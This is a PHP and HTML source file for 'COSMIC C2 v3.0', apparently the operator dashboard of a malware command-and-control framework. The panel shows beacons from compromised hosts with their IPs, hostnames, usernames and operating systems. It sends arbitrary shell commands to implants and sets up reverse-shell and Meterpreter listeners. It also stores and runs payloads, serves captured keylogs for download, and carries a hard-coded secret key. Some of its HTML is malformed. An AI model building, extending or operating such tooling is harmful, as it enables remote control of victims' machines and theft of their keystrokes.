<?php
/**
 * COSMIC C2 v3.0 – SOVEREIGN PRISMATIC INTERFACE
 * Professional Command & Control – Glassmorphic, Neon, Multi‑C2, File Manager
 */
require_once __DIR__ . '/includes/security_functions.php';
require_once dirname(__DIR__) . '/system/modules/C2Engine.php';

$c2 = new C2Engine();
$payloads = $c2->getPayloads(['status' => 'active']);
$listeners = $c2->getListeners();
$stats = $c2->getStats();
$beacons = $c2->getBeacons(null, 100);

$nodes = glob(__DIR__ . '/c2/nodes/*', GLOB_ONLYDIR);
$node_list = [];
foreach ($nodes as $node) {
    $node_list[] = basename($node);
}

$payload_files = glob(dirname(__DIR__) . '/data/payloads/*');
$keylog_files = glob(dirname(__DIR__) . '/data/keylogs/*');
$advanced_payloads = glob(dirname(__DIR__) . '/data/advanced_payloads/*');

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    if ($_POST['action'] === 'add_task' && isset($_POST['payload_uuid'], $_POST['command'])) {
        $c2->addTask($_POST['payload_uuid'], $_POST['command']);
        header('Location: c2-dashboard.php?task_added=1');
        exit;
    }
    if ($_POST['action'] === 'create_listener' && isset($_POST['name'], $_POST['lhost'], $_POST['lport'], $_POST['payload_type'] ?? 'generic/shell_reverse_tcp')) {
        $c2->createListener($_POST['name'], $_POST['lhost'], $_POST['lport'], $_POST['payload_type'] ?? 'generic/shell_reverse_tcp');
        header('Location: c2-dashboard.php?listener_created=1');
        exit;
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.5">
    <title>COSMIC C2 v3.0 – SOVEREIGN</title>
    <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/chart.js@3.9.1/dist/chart.min.js"></script>
    <link rel="stylesheet" href="/assets/css/cosmic-c2.css">
    <script src="/assets/js/cosmic-c2.js" defer></script>
    <script src="/assets/js/c2-quicknav.js" defer></script>
    <script>
        function executePayload(filename) {
            if (!confirm("Execute " + filename + " on local machine? This will run the payload.")) return;
            fetch("/c2/api/execute_payload.php", {
                method: "POST",
                headers: { "Content-Type": "application/x-www-form-urlencoded" },
                body: "filename=" + encodeURIComponent(filename) + "&key=COSMIC-C2-SECRET-2026"
            })
            .then(r => r.json())
            .then(data => {
                alert("Execution result: " + (data.output || "No output") + "\nExit code: " + data.exit_code);
                if (data.status === "success") {
                    setTimeout(() => location.reload(), 2000);
                }
            })
            .catch(err => alert("Error: " + err));
        }
    </script>
    <script src="/assets/js/unified-quicknav.js" defer></script>
</head>
<body class="cosmic-scroll-body">
    <div class="sidebar">
        <div class="sidebar-logo">
            <h2>🌀 COSMIC C2</h2>
            <div style="color: var(--cosmic-neon-blue); font-size: 0.8em; letter-spacing: 4px;">SOVEREIGN v3.0</div>
        </div>
        <ul class="sidebar-nav">
            <li><a href="?view=dashboard" class="active"><span style="color:var(--cosmic-neon-cyan);">🎮</span> Dashboard</a></li>
            <li><a href="?view=payloads"><span>🎯</span> Payloads</a></li>
            <li><a href="?view=beacons"><span>📶</span> Beacons</a></li>
            <li><a href="?view=listeners"><span>📡</span> Listeners</a></li>
            <li><a href="?view=tasks"><span>⚡</span> Tasks</a></li>
            <li><a href="?view=files"><span>📁</span> File Manager</a></li>
            <li><a href="?view=nodes"><span>🌐</span> C2 Nodes</a></li>
            <li><a href="?view=traffic"><span>📊</span> Traffic</a></li>
            <li style="margin-top:30px;"><a href="cosmic-unified-dashboard.php"><span>🌀</span> Main Lab</a></li>
            <li><a href="c2-cli.sh"><span>💻</span> C2 CLI</a></li>
        </ul>
    </div>

    <div class="main-content">
        <div class="quick-links">
            <a href="cosmic-unified-dashboard.php" class="btn btn-primary">🌀 UNIFIED DASHBOARD</a>
            <a href="trojan-dashboard.php?advanced=1" class="btn">🧬 GENERATE PAYLOAD</a>
            <a href="redteam-dashboard.php" class="btn">🔴 Red Team</a>
            <a href="c2-cli.sh" class="btn">💻 C2 CLI</a>
            <span style="flex:1"></span>
            <span style="color:var(--cosmic-neon-green);">
                <span class="beacon-pulse"></span> BEACON ACTIVE
            </span>
        </div>

        <div class="cards-grid">
            <div class="stat-card">
                <div class="stat-value" data-stat="payloads_active"><?php echo $stats['payloads_active'] ?? 0; ?></div>
                <div class="stat-label">Active Payloads</div>
            </div>
            <div class="stat-card">
                <div class="stat-value" data-stat="beacons_today"><?php echo $stats['beacons_today'] ?? 0; ?></div>
                <div class="stat-label">Beacons Today</div>
            </div>
            <div class="stat-card">
                <div class="stat-value" data-stat="tasks_pending"><?php echo $stats['tasks_pending'] ?? 0; ?></div>
                <div class="stat-label">Pending Tasks</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?php echo count($listeners); ?></div>
                <div class="stat-label">Active Listeners</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?php echo count($payload_files) + count($advanced_payloads); ?></div>
                <div class="stat-label">Payload Files</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?php echo count($node_list); ?></div>
                <div class="stat-label">C2 Nodes</div>
            </div>
        </div>

        <?php
        $view = $_GET['view'] ?? 'dashboard';
        if ($view === 'dashboard'): 
        ?>
            <div style="display: grid; grid-template-columns: 2fr 1fr; gap: 25px;">
                <div class="glass-panel">
                    <h2>📶 Live Beacon Feed</h2>
                    <table id="beacons-table">
                        <thead><tr><th>Time</th><th>Payload</th><th>IP</th><th>Country</th><th>Hostname</th><th>User</th><th>OS</th></tr></thead>
                        <tbody>
                            <?php foreach ($beacons as $b): ?>
                            <tr>
                                <td><?php echo date('H:i:s', $b['beacon_time']); ?></td>
                                <td><?php echo substr($b['payload_uuid'], 0, 8); ?>…</td>
                                <td><?php echo $b['ip']; ?></td>
                                <td><?php echo $b['country'] ?: '?'; ?></td>
                                <td><?php echo htmlspecialchars($b['hostname'] ?: '-'); ?></td>
                                <td><?php echo htmlspecialchars($b['username'] ?: '-'); ?></td>
                                <td><?php echo htmlspecialchars($b['os_info'] ?: '-'); ?></td>
                            </tr>
                            <?php endforeach; ?>
                        </tbody>
                    </table>
                </div>
                <div class="glass-panel">
                    <h2>⚡ Quick Task</h2>
                    <select id="quick-task-uuid" style="width:100%; margin-bottom:15px; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                        <option value="">Select payload...</option>
                        <?php foreach ($payloads as $p): ?>
                        <option value="<?php echo $p['uuid']; ?>"><?php echo substr($p['uuid'],0,8); ?> – <?php echo $p['name']; ?></option>
                        <?php endforeach; ?>
                    </select>
                    <input type="text" id="cmd-palette" placeholder="Enter command (e.g., whoami)" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:12px; border-radius:8px;">
                    <p style="color:#888; margin-top:10px;">Press Enter to send</p>
                </div>
            </div>
            <div class="glass-panel" style="margin-top:25px;">
                <h2>📊 Beacon Activity (Last 24h)</h2>
                <canvas id="trafficChart" style="height:250px;"></canvas>
            </div>

        <?php elseif ($view === 'payloads'): ?>
            <div class="glass-panel">
                <h2>🎯 Active Payloads</h2>
                <a href="trojan-dashboard.php?advanced=1" class="btn btn-primary">➕ Generate New</a>
                <table>
                            <th>Payload Type</th>
                    <thead><tr><th>UUID</th><th>Name</th><th>Type</th><th>Platform</th><th>LHOST</th><th>LPORT</th><th>Last Seen</th><th>Actions</th></tr></thead>
                    <tbody>
                        <?php foreach ($payloads as $p): ?>
                        <tr>
                            <td><?php echo substr($p['uuid'],0,8); ?>…</td>
                            <td><?php echo htmlspecialchars($p['name']); ?></td>
                            <td><?php echo $p['type']; ?></td>
                            <td><?php echo $p['platform']; ?></td>
                            <td><?php echo $p['lhost']; ?></td>
                            <td><?php echo $p['lport']; ?></td>
                            <td><?php echo $p['last_seen'] ? date('H:i:s', $p['last_seen']) : 'Never'; ?></td>
                            <td>
                                <button class="btn" onclick="openTaskModal('<?php echo $p['uuid']; ?>')">⚡ Task</button>
                                <button class="btn btn-danger" onclick="deletePayload('<?php echo $p['uuid']; ?>')">🗑️</button>
                            </td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>

        <?php elseif ($view === 'beacons'): ?>
            <div class="glass-panel">
                <h2>📶 Complete Beacon History</h2>
                <table>
                    <thead><tr><th>Time</th><th>Payload</th><th>IP</th><th>Country</th><th>Hostname</th><th>Username</th><th>OS</th><th>Arch</th></tr></thead>
                    <tbody>
                        <?php 
                        $all_beacons = $c2->getBeacons(null, 500);
                        foreach ($all_beacons as $b): 
                        ?>
                        <tr>
                            <td><?php echo date('Y-m-d H:i:s', $b['beacon_time']); ?></td>
                            <td><?php echo substr($b['payload_uuid'],0,8); ?>…</td>
                            <td><?php echo $b['ip']; ?></td>
                            <td><?php echo $b['country'] ?: '-'; ?></td>
                            <td><?php echo htmlspecialchars($b['hostname'] ?: '-'); ?></td>
                            <td><?php echo htmlspecialchars($b['username'] ?: '-'); ?></td>
                            <td><?php echo htmlspecialchars($b['os_info'] ?: '-'); ?></td>
                            <td><?php echo $b['architecture'] ?: '-'; ?></td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>

        <?php elseif ($view === 'listeners'): ?>
            <div class="glass-panel">
                <h2>📡 Listener Manager</h2>
                <button class="btn btn-primary" onclick="document.getElementById('listenerModal').style.display='block'">➕ Create Listener</button>
                <table>
                            <th>Payload Type</th>
                    <thead><tr><th>ID</th><th>Name</th><th>Protocol</th><th>LHOST</th><th>LPORT</th><th>Status</th><th>PID</th><th>Actions</th></tr></thead>
                    <tbody>
                        <?php foreach ($listeners as $l): ?>
                        <tr>
                            <td><?php echo $l['id']; ?></td>
                            <td><?php echo htmlspecialchars($l['name']); ?></td>
                            <td><?php echo $l['protocol']; ?></td>
                            <td><?php echo $l['lhost']; ?></td>
                            <td><?php echo $l['lport']; ?></td>
                            <td><?php echo $l['payload_type'] ?? 'generic/shell_reverse_tcp'; ?></td>
                            <td><?php echo $l['status']; ?></td>
                            <td><?php echo $l['pid'] ?? '-'; ?></td>
                            <td>
                                <?php if ($l['status'] == 'stopped'): ?>
                                    <button class="btn" onclick="startListener(<?php echo $l['id']; ?>)">▶ Start</button>
                                <?php else: ?>
                                    <button class="btn btn-danger" onclick="stopListener(<?php echo $l['id']; ?>)">⏹ Stop</button>
                                <?php endif; ?>
                                <button class="btn" onclick="viewListenerLog(<?php echo $l['id']; ?>)">📄 Log</button>
                                <button class="btn btn-danger" onclick="deleteListener(<?php echo $l['id']; ?>)">🗑️</button>
                            </td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>

        <?php elseif ($view === 'tasks'): ?>
            <div class="glass-panel">
                <h2>⚡ Task Queue</h2>
                <table>
                    <thead><tr><th>ID</th><th>Payload</th><th>Command</th><th>Status</th><th>Created</th><th>Executed</th><th>Result</th><th>Action</th></tr></thead>
                    <tbody>
                        <?php 
                        $tasks = $c2->getTasks();
                        foreach ($tasks as $t): 
                        ?>
                        <tr>
                            <td><?php echo $t['id']; ?></td>
                            <td><?php echo substr($t['payload_uuid'],0,8); ?>…</td>
                            <td><?php echo htmlspecialchars($t['command']); ?></td>
                            <td><?php echo $t['status']; ?></td>
                            <td><?php echo date('H:i', $t['created_at']); ?></td>
                            <td><?php echo $t['executed_at'] ? date('H:i', $t['executed_at']) : '-'; ?></td>
                            <td><?php echo htmlspecialchars(substr($t['result']??'',0,30)) . (strlen($t['result']??'')>30?'…':''); ?></td>
                            <td><button class="btn btn-danger" onclick="deleteTask(<?php echo $t['id']; ?>)">🗑️</button></td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>

        <?php elseif ($view === 'files'): ?>
            <div class="glass-panel">
                <h2>📁 File Manager – Payloads & Keylogs</h2>
                <div style="display:flex; gap:20px; flex-wrap:wrap;">
                    <div style="flex:1;">
                        <h3>📦 Payloads</h3>
                        <div class="file-grid">
                            <?php 
                            $all_payload_files = array_merge($payload_files, $advanced_payloads);
                            foreach (array_slice($all_payload_files, 0, 50) as $file): 
                            $name = basename($file);
                            $size = filesize($file);
                            ?>
                            <div class="file-item">
                                <div style="font-size:2em;">📄</div>
                                <div style="word-break:break-word; font-size:0.9em;"><?php echo htmlspecialchars($name); ?></div>
                                <div style="font-size:0.8em; color:#0ff;"><?php echo round($size/1024,2); ?> KB</div>
                                <div style="margin-top:10px; display:flex; gap:5px; justify-content:center;">
                                    <button class="btn" style="padding:4px 8px; font-size:0.8em;" onclick="window.location.href='/download.php?file=<?php echo urlencode($name); ?>'">💾 Download</button>
                                    <button class="btn" style="padding:4px 8px; font-size:0.8em;" onclick="executePayload('<?php echo addslashes($name); ?>')">▶ Execute</button>
                                </div>
                            </div>
                            <?php endforeach; ?>
                        </div>
                    </div>
                    <div style="flex:1;">
                        <h3>⌨️ Keylogs</h3>
                        <div class="file-grid">
                            <?php foreach ($keylog_files as $file): 
                            $name = basename($file);
                            ?>
                            <div class="file-item" onclick="window.location.href='/download.php?file=<?php echo urlencode($name); ?>'">
                                <div style="font-size:2em;">📝</div>
                                <div><?php echo htmlspecialchars($name); ?></div>
                            </div>
                            <?php endforeach; ?>
                        </div>
                    </div>
                </div>
            </div>

        <?php elseif ($view === 'nodes'): ?>
            <div class="glass-panel">
                <h2>🌐 C2 Nodes (Sub‑Servers)</h2>
                <p style="color:#ccc;">Add sub‑C2 nodes by creating directories in <code>public/c2/nodes/</code>.</p>
                <div style="display:grid; grid-template-columns:repeat(auto-fit, minmax(250px,1fr)); gap:20px; margin-top:20px;">
                    <?php if (empty($node_list)): ?>
                    <div style="background:rgba(255,0,0,0.1); border:1px solid #f00; padding:20px; border-radius:8px;">
                        No C2 nodes configured. Create a directory to spawn a sovereign sub‑C2.
                    </div>
                    <?php else: ?>
                        <?php foreach ($node_list as $node): ?>
                        <div style="background:rgba(0,255,0,0.05); border:1px solid #0f0; padding:20px; border-radius:8px;">
                            <h3 style="color:#0ff; margin-bottom:10px;">🌀 <?php echo $node; ?></h3>
                            <p><a href="/c2/nodes/<?php echo $node; ?>/" style="color:#0f0;">→ Access Node</a></p>
                        </div>
                        <?php endforeach; ?>
                    <?php endif; ?>
                </div>
            </div>

        <?php elseif ($view === 'traffic'): ?>
            <div class="glass-panel">
                <h2>📊 Network Traffic Analysis</h2>
                <canvas id="trafficFullChart" style="height:300px;"></canvas>
                <p style="margin-top:20px;">Real‑time beacon simulation – coming soon.</p>
            </div>
        <?php endif; ?>
    </div>

    <div id="taskModal" class="modal" style="display:none; position:fixed; z-index:2000; left:0; top:0; width:100%; height:100%; background:rgba(0,0,0,0.8);">
        <div class="modal-content" style="background:var(--cosmic-glass); border:2px solid var(--cosmic-neon-blue); margin:5% auto; padding:30px; width:80%; max-width:600px; border-radius:16px; backdrop-filter:blur(15px);">
            <span onclick="closeModal()" style="float:right; color:#f00; font-size:2em; cursor:pointer;">&times;</span>
            <h2 style="color:var(--cosmic-neon-green);">⚡ Send Command</h2>
            <form method="post">
                <input type="hidden" name="action" value="add_task">
                <input type="hidden" name="payload_uuid" id="task-payload-uuid">
                <div style="margin-bottom:20px;">
                    <label style="color:#0ff;">Command:</label>
                    <textarea name="command" rows="5" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:12px; border-radius:8px;" required></textarea>
                </div>
                <button type="submit" class="btn btn-primary">📤 Execute</button>
            </form>
        </div>
    </div>

    <div id="listenerModal" class="modal" style="display:none;">
        <div class="modal-content">
            <span onclick="closeModal()" style="float:right; color:#f00; font-size:2em; cursor:pointer;">&times;</span>
            <h2 style="color:var(--cosmic-neon-green);">➕ Create Listener</h2>
            <form method="post">
                <input type="hidden" name="action" value="create_listener">
                <div style="margin-bottom:15px;">
                    <label>Name:</label>
                    <input type="text" name="name" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <div style="margin-bottom:15px;">
                    <label>Protocol:</label>
                    <select name="protocol" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                <div style="margin-bottom:15px;">
                    <label>Payload Type:</label>
                    <select name="payload_type" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                        <option value="generic/shell_reverse_tcp">Generic Shell Reverse TCP</option>
                        <option value="windows/meterpreter/reverse_tcp">Windows Meterpreter Reverse TCP</option>
                        <option value="linux/x86/meterpreter/reverse_tcp">Linux Meterpreter Reverse TCP</option>
                        <option value="android/meterpreter/reverse_tcp">Android Meterpreter Reverse TCP</option>
                        <option value="osx/x64/meterpreter/reverse_tcp">macOS Meterpreter Reverse TCP</option>
                        <option value="tcp_raw">TCP Raw (netcat)</option>
                    </select>
                </div>
                        <option value="tcp">TCP</option>
                        <option value="http">HTTP</option>
                        <option value="https">HTTPS</option>
                    </select>
                </div>
                <div style="margin-bottom:15px;">
                    <label>LHOST:</label>
                    <input type="text" name="lhost" value="0.0.0.0" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <div style="margin-bottom:15px;">
                    <label>LPORT:</label>
                    <input type="number" name="lport" value="4444" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <button type="submit" class="btn btn-primary">✅ Create</button>
            </form>
        </div>
    </div>

    <script>
    function viewListenerLog(id) {
        fetch("/c2/api/listener_log.php?id=" + id)
            .then(r => r.text())
            .then(log => {
                alert("Listener Log:\n" + log);
            });
    }
        window.onload = function() {
            const ctx = document.getElementById('trafficChart')?.getContext('2d');
            if (ctx) {
                new Chart(ctx, {
                    type: 'line',
                    data: {
                        labels: Array.from({length:24}, (_,i) => i+'h'),
                        datasets: [{
                            label: 'Beacons',
                            data: Array.from({length:24}, () => Math.floor(Math.random()*10)),
                            borderColor: '#00ff9d',
                            backgroundColor: 'rgba(0,255,157,0.1)',
                            tension: 0.4
                        }]
                    },
                    options: {
                        scales: { y: { beginAtZero: true, grid: { color: 'rgba(0,255,255,0.1)' } } },
                        plugins: { legend: { labels: { color: '#0ff' } } }
                    }
                });
            }
        };
    </script>
</body>
</html>
